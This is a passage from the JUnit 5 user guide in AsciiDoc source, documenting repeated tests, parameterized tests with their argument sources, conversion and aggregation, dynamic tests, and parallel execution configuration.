current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` with the unicode theme enabled, execution of\n`RepeatedTestsDemo` results in the following output to the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different\narguments. They are declared just like regular `@Test` methods but use the\n`{ParameterizedTest}` annotation instead. In addition, you must declare at least one\n_source_ that will provide the arguments for each invocation and then _consume_ the\narguments in the test method.\n\nThe following example demonstrates a parameterized test that uses the `@ValueSource`\nannotation to specify a `String` array as the source of arguments.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nWhen executing the above parameterized test method, each invocation will be reported\nseparately. For instance, the `ConsoleLauncher` will print output similar to the\nfollowing.\n\n....\npalindromes(String) \u2714\n\u251c\u2500 [1] racecar \u2714\n\u251c\u2500 [2] radar \u2714\n\u2514\u2500 [3] able was I ere I saw elba \u2714\n....\n\nWARNING: Parameterized tests are currently an _experimental_ feature. Consult the table\nin <<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the\n`junit-jupiter-params` artifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-consuming-arguments]]\n==== Consuming Arguments\n\nParameterized test methods typically _consume_ arguments directly from the configured\nsource (see <<writing-tests-parameterized-tests-sources>>) following a one-to-one\ncorrelation between argument source index and method parameter index (see examples in\n<<writing-tests-parameterized-tests-sources-CsvSource>>). However, a parameterized test\nmethod may also choose to _aggregate_ arguments from the source into a single object\npassed to the method (see <<writing-tests-parameterized-tests-argument-aggregation>>).\nAdditional arguments may also be provided by a `ParameterResolver` (e.g., to obtain an\ninstance of `TestInfo`, `TestReporter`, etc.). Specifically, a parameterized test method\nmust declare formal parameters according to the following rules.\n\n* Zero or more _indexed arguments_ must be declared first.\n* Zero or more _aggregators_ must be declared next.\n* Zero or more arguments supplied by a `ParameterResolver` must be declared last.\n\nIn this context, an _indexed argument_ is an argument for a given index in the\n`Arguments` provided by an `ArgumentsProvider` that is passed as an argument to the\nparameterized method at the same index in the method's formal parameter list. An\n_aggregator_ is any parameter of type `ArgumentsAccessor` or any parameter annotated with\n`@AggregateWith`.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. Please\nrefer to the Javadoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify a single\narray of literal values and can only be used for providing a single argument per\nparameterized test invocation.\n\nThe following types of literal values are supported by `@ValueSource`.\n\n- `short`\n- `byte`\n- `int`\n- `long`\n- `float`\n- `double`\n- `char`\n- `java.lang.String`\n- `java.lang.Class`\n\nFor example, the following `@ParameterizedTest` method will be invoked three times, with\nthe values `1`, `2`, and `3` respectively.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides\nan optional `names` parameter that lets you specify which constants shall be used. If\nomitted, all constants will be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`{MethodSource}` allows you to refer to one or more _factory_ methods of the test class\nor external classes.\n\nFactory methods within the test class must be `static` unless the test class is annotated\nwith `@TestInstance(Lifecycle.PER_CLASS)`; whereas, factory methods in external classes\nmust always be `static`. In addition, such factory methods must not accept any arguments.\n\nEach factory method must generate a _stream_ of _arguments_, and each set of arguments\nwithin the stream will be provided as the physical arguments for individual invocations\nof the annotated `@ParameterizedTest` method. Generally speaking this translates to a\n`Stream` of `Arguments` (i.e., `Stream<Arguments>`); however, the actual concrete return\ntype can take on many forms. In this context, a \"stream\" is anything that JUnit can\nreliably convert into a `Stream`, such as `Stream`, `DoubleStream`, `LongStream`,\n`IntStream`, `Collection`, `Iterator`, `Iterable`, an array of objects, or an array of\nprimitives. The \"arguments\" within the stream can be supplied as an instance of\n`Arguments`, an array of objects (e.g., `Object[]`), or a single value if the\nparameterized test method accepts a single argument.\n\nIf you only need a single parameter, you can return a `Stream` of instances of the\nparameter type as demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nIf you do not explicitly provide a factory method name via `@MethodSource`, JUnit Jupiter\nwill search for a _factory_ method that has the same name as the current\n`@ParameterizedTest` method by convention. This is demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_without_value_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also\nsupported as demonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIf a parameterized test method declares multiple parameters, you need to return a\ncollection, stream, or array of `Arguments` instances or object arrays as shown below\n(see the Javadoc for `{MethodSource}` for further details on supported return types).\nNote that `arguments(Object...)` is a static factory method defined in the `Arguments`\ninterface. In addition, `Arguments.of(Object...)` may be used as an alternative to\n`arguments(Object...)`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\nAn external, `static` _factory_ method can be referenced by providing its _fully\nqualified method name_ as demonstrated in the following example.\n\n[source,java,indent=0]\n----\npackage example;\n\ninclude::{testDir}\/example\/ExternalMethodSourceDemo.java[tags=external_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n`@CsvSource` uses a single quote `'` as its quote character. See the `'baz, qux'` value\nin the example above and in the table below. An empty, quoted value `''` results in an\nempty `String`; whereas, an entirely _empty_ value is interpreted as a `null` reference.\nAn `ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[cols=\"50,50\"]\n|===\n| Example Input | Resulting Argument List\n\n| `@CsvSource({ \"foo, bar\" })` | `\"foo\"`, `\"bar\"`\n| `@CsvSource({ \"foo, 'baz, qux'\" })` | `\"foo\"`, `\"baz, qux\"`\n| `@CsvSource({ \"foo, ''\" })` | `\"foo\"`, `\"\"`\n| `@CsvSource({ \"foo, \" })` | `\"foo\"`, `null`\n|===\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\nNOTE: In contrast to the syntax used in `@CsvSource`, `@CsvFileSource` uses a double\nquote `\"` as the quote character. See the `\"United States of America\"` value in the\nexample above. An empty, quoted value `\"\"` results in an empty `String`; whereas, an\nentirely _empty_ value is interpreted as a `null` reference. An\n`ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`. Note\nthat an implementation of `ArgumentsProvider` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsProvider_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-widening]]\n===== Widening Conversion\n\nJUnit Jupiter supports\nhttps:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/jls-5.html#jls-5.1.2[Widening Primitive\nConversion] for arguments supplied to a `@ParameterizedTest`. For example, a\nparameterized test annotated with `@ValueSource(ints = { 1, 2, 3 })` can be declared to\naccept not only an argument of type `int` but also an argument of type `long`, `float`,\nor `double`.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in\nimplicit type converters. The conversion process depends on the declared type of each\nmethod parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will be\nautomatically converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are implicitly converted to the following target types.\n\nNOTE: Decimal, hexadecimal, and octal `String` literals will be converted to their\nintegral types: `byte`, `short`, `int`, `long`, and their boxed counterparts.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-table]]\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` -> `true`\n| `byte`\/`Byte` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(byte) 15`\n| `char`\/`Character` | `\"o\"` -> `'o'`\n| `short`\/`Short` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(short) 15`\n| `int`\/`Integer` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15`\n| `long`\/`Long` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15L`\n| `float`\/`Float` | `\"1.0\"` -> `1.0f`\n| `double`\/`Double` | `\"1.0\"` -> `1.0d`\n| `Enum` subclass | `\"SECONDS\"` -> `TimeUnit.SECONDS`\n| `java.io.File` | `\"\/path\/to\/file\"` -> `new File(\"\/path\/to\/file\")`\n| `java.lang.Class` | `\"java.lang.Integer\"` -> `java.lang.Integer.class` _(use `$` for nested classes, e.g. `\"java.lang.Thread$State\"`)_\n| `java.lang.Class` | `\"byte\"` -> `byte.class` _(primitive types are supported)_\n| `java.lang.Class` | `\"char[]\"` -> `char[].class` _(array types are supported)_\n| `java.math.BigDecimal` | `\"123.456e789\"` -> `new BigDecimal(\"123.456e789\")`\n| `java.math.BigInteger` | `\"1234567890123456789\"` -> `new BigInteger(\"1234567890123456789\")`\n| `java.net.URI` | `\"http:\/\/junit.org\/\"` -> `URI.create(\"http:\/\/junit.org\/\")`\n| `java.net.URL` | `\"http:\/\/junit.org\/\"` -> `new URL(\"http:\/\/junit.org\/\")`\n| `java.nio.charset.Charset` | `\"UTF-8\"` -> `Charset.forName(\"UTF-8\")`\n| `java.nio.file.Path` | `\"\/path\/to\/file\"` -> `Paths.get(\"\/path\/to\/file\")`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` -> `Instant.ofEpochMilli(0)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` -> `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalDate` | `\"2017-03-14\"` -> `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` -> `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` -> `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.YearMonth` | `\"2017-03\"` -> `YearMonth.of(2017, 3)`\n| `java.time.Year` | `\"2017\"` -> `Year.of(2017)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.util.Currency` | `\"JPY\"` -> `Currency.getInstance(\"JPY\")`\n| `java.util.Locale` | `\"en\"` -> `new Locale(\"en\")`\n| `java.util.UUID` | `\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\"` -> `UUID.fromString(\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\")`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-fallback]]\n====== Fallback String-to-Object Conversion\n\nIn addition to implicit conversion from strings to the target types listed in the above\ntable, JUnit Jupiter also provides a fallback mechanism for automatic conversion from a\n`String` to a given target type if the target type declares exactly one suitable _factory\nmethod_ or a _factory constructor_ as defined below.\n\n- __factory method__: a non-private, `static` method declared in the target type that\n accepts a single `String` argument and returns an instance of the target type. The name\n of the method can be arbitrary and need not follow any particular convention.\n- __factory constructor__: a non-private constructor in the target type that accepts a\n single `String` argument. Note that the target type must be declared as either a\n top-level class or as a `static` nested class.\n\nNOTE: If multiple _factory methods_ are discovered, they will be ignored. If a _factory\nmethod_ and a _factory constructor_ are discovered, the factory method will be used\ninstead of the constructor.\n\nFor example, in the following `@ParameterizedTest` method, the `Book` argument will be\ncreated by invoking the `Book.fromTitle(String)` factory method and passing `\"42 Cats\"`\nas the title of the book.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example_Book]\n----\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of relying on implicit argument conversion you may explicitly specify an\n`ArgumentConverter` to use for a certain parameter using the `@ConvertWith` annotation\nlike in the following example. Note that an implementation of `ArgumentConverter` must be\ndeclared as either a top-level class or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example_ToStringArgumentConverter]\n----\n\nExplicit argument converters are meant to be implemented by test and extension authors.\nThus, `junit-jupiter-params` only provides a single explicit argument converter that may\nalso serve as a reference implementation: `JavaTimeArgumentConverter`. It is used via the\ncomposed annotation `JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n[[writing-tests-parameterized-tests-argument-aggregation]]\n==== Argument Aggregation\n\nBy default, each _argument_ provided to a `@ParameterizedTest` method corresponds to a\nsingle method parameter. Consequently, argument sources which are expected to supply a\nlarge number of arguments can lead to large method signatures.\n\nIn such cases, an `{ArgumentsAccessor}` can be used instead of multiple parameters. Using\nthis API, you can access the provided arguments through a single argument passed to your\ntest method. In addition, type conversion is supported as discussed in\n<<writing-tests-parameterized-tests-argument-conversion-implicit>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAccessor_example]\n----\n\n_An instance of `ArgumentsAccessor` is automatically injected into any parameter of type\n`ArgumentsAccessor`._\n\n[[writing-tests-parameterized-tests-argument-aggregation-custom]]\n===== Custom Aggregators\n\nApart from direct access to a `@ParameterizedTest` method's arguments using an\n`ArgumentsAccessor`, JUnit Jupiter also supports the usage of custom, reusable\n_aggregators_.\n\nTo use a custom aggregator, implement the `{ArgumentsAggregator}` interface and register\nit via the `@AggregateWith` annotation on a compatible parameter in the\n`@ParameterizedTest` method. The result of the aggregation will then be provided as an\nargument for the corresponding parameter when the parameterized test is invoked. Note\nthat an implementation of `ArgumentsAggregator` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example_PersonAggregator]\n----\n\nIf you find yourself repeatedly declaring `@AggregateWith(MyTypeAggregator.class)` for\nmultiple parameterized test methods across your codebase, you may wish to create a custom\n_composed annotation_ such as `@CsvToMyType` that is meta-annotated with\n`@AggregateWith(MyTypeAggregator.class)`. The following example demonstrates this in\naction with a custom `@CsvToPerson` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example_CsvToPerson]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However,\nmethod parameters that are resolved by argument sources need to come first in the\nargument list. Since a test class may contain regular tests as well as parameterized\ntests with different parameter lists, values from argument sources are not resolved for\nlifecycle methods (e.g. `@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-test-templates]]\n=== Test Templates\n\nA `{TestTemplate}` method is not a regular test case but rather a template for test\ncases. As such, it is designed to be invoked multiple times depending on the number of\ninvocation contexts returned by the registered providers. Thus, it must be used in\nconjunction with a registered `{TestTemplateInvocationContextProvider}` extension. Each\ninvocation of a test template method behaves like the execution of a regular `@Test`\nmethod with full support for the same lifecycle callbacks and extensions. Please refer to\n<<extensions-test-templates>> for usage examples.\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in\n<<writing-tests-annotations>> is very similar to the `@Test` annotation in JUnit 4. Both\ndescribe methods that implement test cases. These test cases are static in the sense that\nthey are fully specified at compile time, and their behavior cannot be changed by\nanything happening at runtime. _Assumptions provide a basic form of dynamic behavior but\nare intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests a completely new kind of test programming model has\nbeen introduced in JUnit Jupiter. This new kind of test is a _dynamic test_ which is\ngenerated at runtime by a factory method that is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but\nrather a factory for test cases. Thus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a single `DynamicNode` or a\n`Stream`, `Collection`, `Iterable`, `Iterator`, or array of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child\nnodes, enabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will be executed lazily, enabling dynamic and even\nnon-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling\n`stream.close()`, making it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static` and may\noptionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime. It is composed of a _display name_\nand an `Executable`. `Executable` is a `@FunctionalInterface` which means that the\nimplementations of dynamic tests can be provided as _lambda expressions_ or _method\nreferences_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their\ncorresponding extension callbacks are executed for the `@TestFactory` method but not for\neach _dynamic test_. In other words, if you access fields from the test instance within a\nlambda expression for a dynamic test, those fields will not be reset by callback methods\nor extensions between the execution of individual dynamic tests generated by the same\n`@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\nWARNING: Dynamic tests are currently an _experimental_ feature. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories\nand dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances. Most of\nthese examples do not really exhibit dynamic behavior but merely demonstrate the\nsupported return types in principle. However, `dynamicTestsFromStream()` and\n`dynamicTestsFromIntStream()` demonstrate how easy it is to generate dynamic tests for a\ngiven set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature. `generateRandomNumberOfTests()` implements an\n`Iterator` that generates random numbers, a display name generator, and a test executor\nand then provides all three to `DynamicTest.stream()`. Although the non-deterministic\nbehavior of `generateRandomNumberOfTests()` is of course in conflict with test\nrepeatability and should thus be used with care, it serves to demonstrate the\nexpressiveness and power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing\n`DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-parallel-execution]]\n=== Parallel Execution\n\n.Parallel test execution is an experimental feature\nWARNING: You're invited to give it a try and provide feedback to the JUnit team so they\ncan improve and eventually <<api-evolution, promote>> this feature.\n\nBy default, JUnit Jupiter tests are run sequentially in a single thread. Running tests in\nparallel -- for example, to speed up execution -- is available as an opt-in feature since\nversion 5.3. To enable parallel execution, set the\n`junit.jupiter.execution.parallel.enabled` configuration parameter to `true` -- for\nexample, in `junit-platform.properties` (see <<running-tests-config-params>> for other\noptions).\n\nPlease note that enabling this property is only the first step required to execute tests\nin parallel. If enabled, test classes and methods will still be executed sequentially by\ndefault. Whether or not a node in the test tree is executed concurrently is controlled by\nits execution mode. The following two modes are available.\n\n`SAME_THREAD`::\n Force execution in the same thread used by the parent. For example, when used on a test\n method, the test method will be executed in the same thread as any `@BeforeAll` or\n `@AfterAll` methods of the containing test class.\n\n`CONCURRENT`::\n Execute concurrently unless a resource lock forces execution in the same thread.\n\nBy default, nodes in the test tree use the `SAME_THREAD` execution mode. You can change\nthe default by setting the `junit.jupiter.execution.parallel.mode.default` configuration\nparameter. Alternatively, you can use the `{Execution}` annotation to change the\nexecution mode for the annotated element and its subelements (if any) which allows you to\nactivate parallel execution for individual test classes, one by one.\n\n[source,properties]\n.Configuration parameters to execute all tests in parallel\n----\njunit.jupiter.execution.parallel.enabled = true\njunit.jupiter.execution.parallel.mode.default = concurrent\n----\n\nThe default execution mode is applied to all nodes of the test tree with a few notable\nexceptions, namely test classes that use the `Lifecycle.PER_CLASS` mode or a\n`{MethodOrderer}` (except for `{Random}`). In the former case, test authors have to\nensure that the test class is thread-safe; in the latter, concurrent execution 